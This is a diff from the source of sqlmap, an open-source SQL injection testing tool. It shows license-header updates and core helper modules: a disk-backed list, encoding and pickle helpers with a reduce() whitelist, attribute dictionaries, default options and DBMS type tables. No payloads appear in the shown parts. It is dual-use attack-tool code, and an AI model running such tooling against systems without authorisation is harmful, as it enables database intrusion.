||||||
|
pass
|
||||||
|
else:
|
||||||
|
conf.dbmsConnector.connect()
|
||||||
|
|
||||||
|
if handler.checkDbms():
|
||||||
|
if kb.resolutionDbms:
|
||||||
|
conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]()
|
||||||
|
else:
|
||||||
|
conf.dbmsHandler = handler
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
conf.dbmsConnector = None
|
||||||
|
|
||||||
|
# At this point back-end DBMS is correctly fingerprinted, no need
|
||||||
|
# to enforce it anymore
|
||||||
|
Backend.flushForcedDbms()
|
||||||
|
|||||||
@@ -1,25 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
1017
lib/core/agent.py
1017
lib/core/agent.py
File diff suppressed because it is too large
Load Diff
168
lib/core/bigarray.py
Normal file
168
lib/core/bigarray.py
Normal file
@@ -0,0 +1,168 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
try:
|
||||||
|
import cPickle as pickle
|
||||||
|
except:
|
||||||
|
import pickle
|
||||||
|
|
||||||
|
import itertools
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import tempfile
|
||||||
|
|
||||||
|
from lib.core.enums import MKSTEMP_PREFIX
|
||||||
|
from lib.core.exception import SqlmapSystemException
|
||||||
|
from lib.core.settings import BIGARRAY_CHUNK_SIZE
|
||||||
|
|
||||||
|
DEFAULT_SIZE_OF = sys.getsizeof(object())
|
||||||
|
|
||||||
|
def _size_of(object_):
|
||||||
|
"""
|
||||||
|
Returns total size of a given object_ (in bytes)
|
||||||
|
"""
|
||||||
|
|
||||||
|
retval = sys.getsizeof(object_, DEFAULT_SIZE_OF)
|
||||||
|
if isinstance(object_, dict):
|
||||||
|
retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object_.items()))
|
||||||
|
elif hasattr(object_, "__iter__"):
|
||||||
|
retval += sum(_size_of(_) for _ in object_)
|
||||||
|
return retval
|
||||||
|
|
||||||
|
class Cache(object):
|
||||||
|
"""
|
||||||
|
Auxiliary class used for storing cached chunks
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, index, data, dirty):
|
||||||
|
self.index = index
|
||||||
|
self.data = data
|
||||||
|
self.dirty = dirty
|
||||||
|
|
||||||
|
class BigArray(list):
|
||||||
|
"""
|
||||||
|
List-like class used for storing large amounts of data (disk cached)
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
self.chunks = [[]]
|
||||||
|
self.chunk_length = sys.maxint
|
||||||
|
self.cache = None
|
||||||
|
self.filenames = set()
|
||||||
|
self._os_remove = os.remove
|
||||||
|
self._size_counter = 0
|
||||||
|
|
||||||
|
def append(self, value):
|
||||||
|
self.chunks[-1].append(value)
|
||||||
|
if self.chunk_length == sys.maxint:
|
||||||
|
self._size_counter += _size_of(value)
|
||||||
|
if self._size_counter >= BIGARRAY_CHUNK_SIZE:
|
||||||
|
self.chunk_length = len(self.chunks[-1])
|
||||||
|
self._size_counter = None
|
||||||
|
if len(self.chunks[-1]) >= self.chunk_length:
|
||||||
|
filename = self._dump(self.chunks[-1])
|
||||||
|
self.chunks[-1] = filename
|
||||||
|
self.chunks.append([])
|
||||||
|
|
||||||
|
def extend(self, value):
|
||||||
|
for _ in value:
|
||||||
|
self.append(_)
|
||||||
|
|
||||||
|
def pop(self):
|
||||||
|
if len(self.chunks[-1]) < 1:
|
||||||
|
self.chunks.pop()
|
||||||
|
try:
|
||||||
|
with open(self.chunks[-1], "rb") as fp:
|
||||||
|
self.chunks[-1] = pickle.load(fp)
|
||||||
|
except IOError, ex:
|
||||||
|
errMsg = "exception occurred while retrieving data "
|
||||||
|
errMsg += "from a temporary file ('%s')" % ex.message
|
||||||
|
raise SqlmapSystemException, errMsg
|
||||||
|
return self.chunks[-1].pop()
|
||||||
|
|
||||||
|
def index(self, value):
|
||||||
|
for index in xrange(len(self)):
|
||||||
|
if self[index] == value:
|
||||||
|
return index
|
||||||
|
return ValueError, "%s is not in list" % value
|
||||||
|
|
||||||
|
def _dump(self, chunk):
|
||||||
|
try:
|
||||||
|
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.BIG_ARRAY)
|
||||||
|
self.filenames.add(filename)
|
||||||
|
os.close(handle)
|
||||||
|
with open(filename, "w+b") as fp:
|
||||||
|
pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
|
||||||
|
return filename
|
||||||
|
except (OSError, IOError), ex:
|
||||||
|
errMsg = "exception occurred while storing data "
|
||||||
|
errMsg += "to a temporary file ('%s'). Please " % ex.message
|
||||||
|
errMsg += "make sure that there is enough disk space left. If problem persists, "
|
||||||
|
errMsg += "try to set environment variable 'TEMP' to a location "
|
||||||
|
errMsg += "writeable by the current user"
|
||||||
|
raise SqlmapSystemException, errMsg
|
||||||
|
|
||||||
|
def _checkcache(self, index):
|
||||||
|
if (self.cache and self.cache.index != index and self.cache.dirty):
|
||||||
|
filename = self._dump(self.cache.data)
|
||||||
|
self.chunks[self.cache.index] = filename
|
||||||
|
if not (self.cache and self.cache.index == index):
|
||||||
|
try:
|
||||||
|
with open(self.chunks[index], "rb") as fp:
|
||||||
|
self.cache = Cache(index, pickle.load(fp), False)
|
||||||
|
except IOError, ex:
|
||||||
|
errMsg = "exception occurred while retrieving data "
|
||||||
|
errMsg += "from a temporary file ('%s')" % ex.message
|
||||||
|
raise SqlmapSystemException, errMsg
|
||||||
|
|
||||||
|
def __getstate__(self):
|
||||||
|
return self.chunks, self.filenames
|
||||||
|
|
||||||
|
def __setstate__(self, state):
|
||||||
|
self.__init__()
|
||||||
|
self.chunks, self.filenames = state
|
||||||
|
|
||||||
|
def __getslice__(self, i, j):
|
||||||
|
retval = BigArray()
|
||||||
|
i = max(0, len(self) + i if i < 0 else i)
|
||||||
|
j = min(len(self), len(self) + j if j < 0 else j)
|
||||||
|
for _ in xrange(i, j):
|
||||||
|
retval.append(self[_])
|
||||||
|
return retval
|
||||||
|
|
||||||
|
def __getitem__(self, y):
|
||||||
|
if y < 0:
|
||||||
|
y += len(self)
|
||||||
|
index = y / self.chunk_length
|
||||||
|
offset = y % self.chunk_length
|
||||||
|
chunk = self.chunks[index]
|
||||||
|
if isinstance(chunk, list):
|
||||||
|
return chunk[offset]
|
||||||
|
else:
|
||||||
|
self._checkcache(index)
|
||||||
|
return self.cache.data[offset]
|
||||||
|
|
||||||
|
def __setitem__(self, y, value):
|
||||||
|
index = y / self.chunk_length
|
||||||
|
offset = y % self.chunk_length
|
||||||
|
chunk = self.chunks[index]
|
||||||
|
if isinstance(chunk, list):
|
||||||
|
chunk[offset] = value
|
||||||
|
else:
|
||||||
|
self._checkcache(index)
|
||||||
|
self.cache.data[offset] = value
|
||||||
|
self.cache.dirty = True
|
||||||
|
|
||||||
|
def __repr__(self):
|
||||||
|
return "%s%s" % ("..." if len(self.chunks) > 1 else "", self.chunks[-1].__repr__())
|
||||||
|
|
||||||
|
def __iter__(self):
|
||||||
|
for i in xrange(len(self)):
|
||||||
|
yield self[i]
|
||||||
|
|
||||||
|
def __len__(self):
|
||||||
|
return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1])
|
||||||
4292
lib/core/common.py
4292
lib/core/common.py
File diff suppressed because it is too large
Load Diff
@@ -1,86 +1,219 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import base64
|
||||||
|
import json
|
||||||
|
import pickle
|
||||||
|
import re
|
||||||
|
import StringIO
|
||||||
|
import sys
|
||||||
|
|
||||||
|
from lib.core.settings import IS_WIN
|
||||||
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
|
from lib.core.settings import PICKLE_REDUCE_WHITELIST
|
||||||
|
|
||||||
import md5
|
def base64decode(value):
|
||||||
import sha
|
"""
|
||||||
import struct
|
Decodes string value from Base64 to plain format
|
||||||
import urllib
|
|
||||||
|
|
||||||
|
>>> base64decode('Zm9vYmFy')
|
||||||
|
'foobar'
|
||||||
|
"""
|
||||||
|
|
||||||
def base64decode(string):
|
return base64.b64decode(value)
|
||||||
return string.decode("base64")
|
|
||||||
|
|
||||||
|
def base64encode(value):
|
||||||
|
"""
|
||||||
|
Encodes string value from plain to Base64 format
|
||||||
|
|
||||||
def base64encode(string):
|
>>> base64encode('foobar')
|
||||||
return string.encode("base64")[:-1]
|
'Zm9vYmFy'
|
||||||
|
"""
|
||||||
|
|
||||||
|
return base64.b64encode(value)
|
||||||
|
|
||||||
def hexdecode(string):
|
def base64pickle(value):
|
||||||
string = string.lower()
|
"""
|
||||||
|
Serializes (with pickle) and encodes to Base64 format supplied (binary) value
|
||||||
|
|
||||||
if string.startswith("0x"):
|
>>> base64pickle('foobar')
|
||||||
string = string[2:]
|
'gAJVBmZvb2JhcnEALg=='
|
||||||
|
"""
|
||||||
|
|
||||||
return string.decode("hex")
|
retVal = None
|
||||||
|
|
||||||
|
try:
|
||||||
|
retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
|
||||||
|
except:
|
||||||
|
warnMsg = "problem occurred while serializing "
|
||||||
|
warnMsg += "instance of a type '%s'" % type(value)
|
||||||
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
def hexencode(string):
|
try:
|
||||||
return string.encode("hex")
|
retVal = base64encode(pickle.dumps(value))
|
||||||
|
except:
|
||||||
|
retVal = base64encode(pickle.dumps(str(value), pickle.HIGHEST_PROTOCOL))
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
def md5hash(string):
|
def base64unpickle(value):
|
||||||
return md5.new(string).hexdigest()
|
"""
|
||||||
|
Decodes value from Base64 to plain format and deserializes (with pickle) its content
|
||||||
|
|
||||||
|
>>> base64unpickle('gAJVBmZvb2JhcnEALg==')
|
||||||
|
'foobar'
|
||||||
|
"""
|
||||||
|
|
||||||
def orddecode(string):
|
retVal = None
|
||||||
packedString = struct.pack("!"+"I" * len(string), *string)
|
|
||||||
return "".join([chr(char) for char in struct.unpack("!"+"I"*(len(packedString)/4), packedString)])
|
|
||||||
|
|
||||||
|
def _(self):
|
||||||
|
if len(self.stack) > 1:
|
||||||
|
func = self.stack[-2]
|
||||||
|
if func not in PICKLE_REDUCE_WHITELIST:
|
||||||
|
raise Exception, "abusing reduce() is bad, Mkay!"
|
||||||
|
self.load_reduce()
|
||||||
|
|
||||||
def ordencode(string):
|
def loads(str):
|
||||||
return tuple([ord(char) for char in string])
|
file = StringIO.StringIO(str)
|
||||||
|
unpickler = pickle.Unpickler(file)
|
||||||
|
unpickler.dispatch[pickle.REDUCE] = _
|
||||||
|
return unpickler.load()
|
||||||
|
|
||||||
|
try:
|
||||||
|
retVal = loads(base64decode(value))
|
||||||
|
except TypeError:
|
||||||
|
retVal = loads(base64decode(bytes(value)))
|
||||||
|
|
||||||
def sha1hash(string):
|
return retVal
|
||||||
return sha.new(string).hexdigest()
|
|
||||||
|
|
||||||
|
def hexdecode(value):
|
||||||
|
"""
|
||||||
|
Decodes string value from hex to plain format
|
||||||
|
|
||||||
def urldecode(string):
|
>>> hexdecode('666f6f626172')
|
||||||
if not string:
|
'foobar'
|
||||||
return
|
"""
|
||||||
|
|
||||||
doublePercFreeString = string.replace("%%", "__DPERC__")
|
value = value.lower()
|
||||||
unquotedString = urllib.unquote_plus(doublePercFreeString)
|
return (value[2:] if value.startswith("0x") else value).decode("hex")
|
||||||
unquotedString = unquotedString.replace("__DPERC__", "%%")
|
|
||||||
|
|
||||||
return unquotedString
|
def hexencode(value):
|
||||||
|
"""
|
||||||
|
Encodes string value from plain to hex format
|
||||||
|
|
||||||
|
>>> hexencode('foobar')
|
||||||
|
'666f6f626172'
|
||||||
|
"""
|
||||||
|
|
||||||
def urlencode(string, safe=":/?%&="):
|
return utf8encode(value).encode("hex")
|
||||||
if not string:
|
|
||||||
return
|
|
||||||
|
|
||||||
return urllib.quote(string, safe)
|
def unicodeencode(value, encoding=None):
|
||||||
|
"""
|
||||||
|
Returns 8-bit string representation of the supplied unicode value
|
||||||
|
|
||||||
|
>>> unicodeencode(u'foobar')
|
||||||
|
'foobar'
|
||||||
|
"""
|
||||||
|
|
||||||
|
retVal = value
|
||||||
|
if isinstance(value, unicode):
|
||||||
|
try:
|
||||||
|
retVal = value.encode(encoding or UNICODE_ENCODING)
|
||||||
|
except UnicodeEncodeError:
|
||||||
|
retVal = value.encode(UNICODE_ENCODING, "replace")
|
||||||
|
return retVal
|
||||||
|
|
||||||
|
def utf8encode(value):
|
||||||
|
"""
|
||||||
|
Returns 8-bit string representation of the supplied UTF-8 value
|
||||||
|
|
||||||
|
>>> utf8encode(u'foobar')
|
||||||
|
'foobar'
|
||||||
|
"""
|
||||||
|
|
||||||
|
return unicodeencode(value, "utf-8")
|
||||||
|
|
||||||
|
def utf8decode(value):
|
||||||
|
"""
|
||||||
|
Returns UTF-8 representation of the supplied 8-bit string representation
|
||||||
|
|
||||||
|
>>> utf8decode('foobar')
|
||||||
|
u'foobar'
|
||||||
|
"""
|
||||||
|
|
||||||
|
return value.decode("utf-8")
|
||||||
|
|
||||||
|
def htmlunescape(value):
|
||||||
|
"""
|
||||||
|
Returns (basic conversion) HTML unescaped value
|
||||||
|
|
||||||
|
>>> htmlunescape('a<b')
|
||||||
|
'a<b'
|
||||||
|
"""
|
||||||
|
|
||||||
|
retVal = value
|
||||||
|
if value and isinstance(value, basestring):
|
||||||
|
codes = (('<', '<'), ('>', '>'), ('"', '"'), (' ', ' '), ('&', '&'))
|
||||||
|
retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal)
|
||||||
|
try:
|
||||||
|
retVal = re.sub(r"&#x([^ ;]+);", lambda match: unichr(int(match.group(1), 16)), retVal)
|
||||||
|
except ValueError:
|
||||||
|
pass
|
||||||
|
return retVal
|
||||||
|
|
||||||
|
def singleTimeWarnMessage(message): # Cross-linked function
|
||||||
|
sys.stdout.write(message)
|
||||||
|
sys.stdout.write("\n")
|
||||||
|
sys.stdout.flush()
|
||||||
|
|
||||||
|
def stdoutencode(data):
|
||||||
|
retVal = None
|
||||||
|
|
||||||
|
try:
|
||||||
|
data = data or ""
|
||||||
|
|
||||||
|
# Reference: http://bugs.python.org/issue1602
|
||||||
|
if IS_WIN:
|
||||||
|
output = data.encode(sys.stdout.encoding, "replace")
|
||||||
|
|
||||||
|
if '?' in output and '?' not in data:
|
||||||
|
warnMsg = "cannot properly display Unicode characters "
|
||||||
|
warnMsg += "inside Windows OS command prompt "
|
||||||
|
warnMsg += "(http://bugs.python.org/issue1602). All "
|
||||||
|
warnMsg += "unhandled occurances will result in "
|
||||||
|
warnMsg += "replacement with '?' character. Please, find "
|
||||||
|
warnMsg += "proper character representation inside "
|
||||||
|
warnMsg += "corresponding output files. "
|
||||||
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
|
retVal = output
|
||||||
|
else:
|
||||||
|
retVal = data.encode(sys.stdout.encoding)
|
||||||
|
except:
|
||||||
|
retVal = data.encode(UNICODE_ENCODING) if isinstance(data, unicode) else data
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
|
def jsonize(data):
|
||||||
|
"""
|
||||||
|
Returns JSON serialized data
|
||||||
|
|
||||||
|
>>> jsonize({'foo':'bar'})
|
||||||
|
'{\\n "foo": "bar"\\n}'
|
||||||
|
"""
|
||||||
|
|
||||||
|
return json.dumps(data, sort_keys=False, indent=4)
|
||||||
|
|
||||||
|
def dejsonize(data):
|
||||||
|
"""
|
||||||
|
Returns JSON deserialized data
|
||||||
|
|
||||||
|
>>> dejsonize('{\\n "foo": "bar"\\n}')
|
||||||
|
{u'foo': u'bar'}
|
||||||
|
"""
|
||||||
|
|
||||||
|
return json.loads(data)
|
||||||
|
|||||||
@@ -1,45 +1,28 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from lib.core.datatype import AttribDict
|
||||||
|
from lib.core.log import LOGGER
|
||||||
from lib.core.datatype import advancedDict
|
|
||||||
from lib.core.settings import LOGGER
|
|
||||||
|
|
||||||
# sqlmap paths
|
# sqlmap paths
|
||||||
paths = advancedDict()
|
paths = AttribDict()
|
||||||
|
|
||||||
|
# object to store original command line options
|
||||||
|
cmdLineOptions = AttribDict()
|
||||||
|
|
||||||
|
# object to store merged options (command line, configuration file and default options)
|
||||||
|
mergedOptions = AttribDict()
|
||||||
|
|
||||||
# object to share within function and classes command
|
# object to share within function and classes command
|
||||||
# line options and settings
|
# line options and settings
|
||||||
conf = advancedDict()
|
conf = AttribDict()
|
||||||
|
|
||||||
# object to share within function and classes results
|
# object to share within function and classes results
|
||||||
kb = advancedDict()
|
kb = AttribDict()
|
||||||
|
|
||||||
# object to share within function and classes temporary data,
|
|
||||||
# just for internal use
|
|
||||||
temp = advancedDict()
|
|
||||||
|
|
||||||
# object with each database management system specific queries
|
# object with each database management system specific queries
|
||||||
queries = {}
|
queries = {}
|
||||||
|
|||||||
@@ -1,35 +1,22 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import copy
|
||||||
|
import types
|
||||||
|
|
||||||
from lib.core.exception import sqlmapDataException
|
class AttribDict(dict):
|
||||||
|
|
||||||
|
|
||||||
class advancedDict(dict):
|
|
||||||
"""
|
"""
|
||||||
This class defines the sqlmap object, inheriting from Python data
|
This class defines the sqlmap object, inheriting from Python data
|
||||||
type dictionary.
|
type dictionary.
|
||||||
|
|
||||||
|
>>> foo = AttribDict()
|
||||||
|
>>> foo.bar = 1
|
||||||
|
>>> foo.bar
|
||||||
|
1
|
||||||
"""
|
"""
|
||||||
|
|
||||||
def __init__(self, indict=None, attribute=None):
|
def __init__(self, indict=None, attribute=None):
|
||||||
@@ -45,7 +32,6 @@ class advancedDict(dict):
|
|||||||
# After initialisation, setting attributes
|
# After initialisation, setting attributes
|
||||||
# is the same as setting an item
|
# is the same as setting an item
|
||||||
|
|
||||||
|
|
||||||
def __getattr__(self, item):
|
def __getattr__(self, item):
|
||||||
"""
|
"""
|
||||||
Maps values to attributes
|
Maps values to attributes
|
||||||
@@ -55,8 +41,7 @@ class advancedDict(dict):
|
|||||||
try:
|
try:
|
||||||
return self.__getitem__(item)
|
return self.__getitem__(item)
|
||||||
except KeyError:
|
except KeyError:
|
||||||
raise sqlmapDataException, "Unable to access item '%s'" % item
|
raise AttributeError("unable to access item '%s'" % item)
|
||||||
|
|
||||||
|
|
||||||
def __setattr__(self, item, value):
|
def __setattr__(self, item, value):
|
||||||
"""
|
"""
|
||||||
@@ -65,13 +50,57 @@ class advancedDict(dict):
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
# This test allows attributes to be set in the __init__ method
|
# This test allows attributes to be set in the __init__ method
|
||||||
if not self.__dict__.has_key('_advancedDict__initialised'):
|
if "_AttribDict__initialised" not in self.__dict__:
|
||||||
return dict.__setattr__(self, item, value)
|
return dict.__setattr__(self, item, value)
|
||||||
|
|
||||||
# Any normal attributes are handled normally
|
# Any normal attributes are handled normally
|
||||||
elif self.__dict__.has_key(item):
|
elif item in self.__dict__:
|
||||||
dict.__setattr__(self, item, value)
|
dict.__setattr__(self, item, value)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
self.__setitem__(item, value)
|
self.__setitem__(item, value)
|
||||||
|
|
||||||
|
def __getstate__(self):
|
||||||
|
return self.__dict__
|
||||||
|
|
||||||
|
def __setstate__(self, dict):
|
||||||
|
self.__dict__ = dict
|
||||||
|
|
||||||
|
def __deepcopy__(self, memo):
|
||||||
|
retVal = self.__class__()
|
||||||
|
memo[id(self)] = retVal
|
||||||
|
|
||||||
|
for attr in dir(self):
|
||||||
|
if not attr.startswith('_'):
|
||||||
|
value = getattr(self, attr)
|
||||||
|
if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
|
||||||
|
setattr(retVal, attr, copy.deepcopy(value, memo))
|
||||||
|
|
||||||
|
for key, value in self.items():
|
||||||
|
retVal.__setitem__(key, copy.deepcopy(value, memo))
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
|
class InjectionDict(AttribDict):
|
||||||
|
def __init__(self):
|
||||||
|
AttribDict.__init__(self)
|
||||||
|
|
||||||
|
self.place = None
|
||||||
|
self.parameter = None
|
||||||
|
self.ptype = None
|
||||||
|
self.prefix = None
|
||||||
|
self.suffix = None
|
||||||
|
self.clause = None
|
||||||
|
self.notes = [] # Note: https://github.com/sqlmapproject/sqlmap/issues/1888
|
||||||
|
|
||||||
|
# data is a dict with various stype, each which is a dict with
|
||||||
|
# all the information specific for that stype
|
||||||
|
self.data = AttribDict()
|
||||||
|
|
||||||
|
# conf is a dict which stores current snapshot of important
|
||||||
|
# options used during detection
|
||||||
|
self.conf = AttribDict()
|
||||||
|
|
||||||
|
self.dbms = None
|
||||||
|
self.dbms_version = None
|
||||||
|
self.os = None
|
||||||
|
|||||||
27
lib/core/decorators.py
Normal file
27
lib/core/decorators.py
Normal file
@@ -0,0 +1,27 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
def cachedmethod(f, cache={}):
|
||||||
|
"""
|
||||||
|
Method with a cached content
|
||||||
|
|
||||||
|
Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/
|
||||||
|
"""
|
||||||
|
|
||||||
|
def _(*args, **kwargs):
|
||||||
|
try:
|
||||||
|
key = (f, tuple(args), frozenset(kwargs.items()))
|
||||||
|
if key not in cache:
|
||||||
|
cache[key] = f(*args, **kwargs)
|
||||||
|
except:
|
||||||
|
key = "".join(str(_) for _ in (f, args, kwargs))
|
||||||
|
if key not in cache:
|
||||||
|
cache[key] = f(*args, **kwargs)
|
||||||
|
|
||||||
|
return cache[key]
|
||||||
|
|
||||||
|
return _
|
||||||
27
lib/core/defaults.py
Normal file
27
lib/core/defaults.py
Normal file
@@ -0,0 +1,27 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
from lib.core.datatype import AttribDict
|
||||||
|
|
||||||
|
_defaults = {
|
||||||
|
"csvDel": ",",
|
||||||
|
"timeSec": 5,
|
||||||
|
"googlePage": 1,
|
||||||
|
"verbose": 1,
|
||||||
|
"delay": 0,
|
||||||
|
"timeout": 30,
|
||||||
|
"retries": 3,
|
||||||
|
"saFreq": 0,
|
||||||
|
"threads": 1,
|
||||||
|
"level": 1,
|
||||||
|
"risk": 1,
|
||||||
|
"dumpFormat": "CSV",
|
||||||
|
"tech": "BEUSTQ",
|
||||||
|
"torType": "HTTP",
|
||||||
|
}
|
||||||
|
|
||||||
|
defaults = AttribDict(_defaults)
|
||||||
239
lib/core/dicts.py
Normal file
239
lib/core/dicts.py
Normal file
@@ -0,0 +1,239 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
from lib.core.enums import DBMS
|
||||||
|
from lib.core.enums import OS
|
||||||
|
from lib.core.enums import POST_HINT
|
||||||
|
from lib.core.settings import BLANK
|
||||||
|
from lib.core.settings import NULL
|
||||||
|
from lib.core.settings import MSSQL_ALIASES
|
||||||
|
from lib.core.settings import MYSQL_ALIASES
|
||||||
|
from lib.core.settings import PGSQL_ALIASES
|
||||||
|
from lib.core.settings import ORACLE_ALIASES
|
||||||
|
from lib.core.settings import SQLITE_ALIASES
|
||||||
|
from lib.core.settings import ACCESS_ALIASES
|
||||||
|
from lib.core.settings import FIREBIRD_ALIASES
|
||||||
|
from lib.core.settings import MAXDB_ALIASES
|
||||||
|
from lib.core.settings import SYBASE_ALIASES
|
||||||
|
from lib.core.settings import DB2_ALIASES
|
||||||
|
from lib.core.settings import HSQLDB_ALIASES
|
||||||
|
|
||||||
|
FIREBIRD_TYPES = {
|
||||||
|
261: "BLOB",
|
||||||
|
14: "CHAR",
|
||||||
|
40: "CSTRING",
|
||||||
|
11: "D_FLOAT",
|
||||||
|
27: "DOUBLE",
|
||||||
|
10: "FLOAT",
|
||||||
|
16: "INT64",
|
||||||
|
8: "INTEGER",
|
||||||
|
9: "QUAD",
|
||||||
|
7: "SMALLINT",
|
||||||
|
12: "DATE",
|
||||||
|
13: "TIME",
|
||||||
|
35: "TIMESTAMP",
|
||||||
|
37: "VARCHAR",
|
||||||
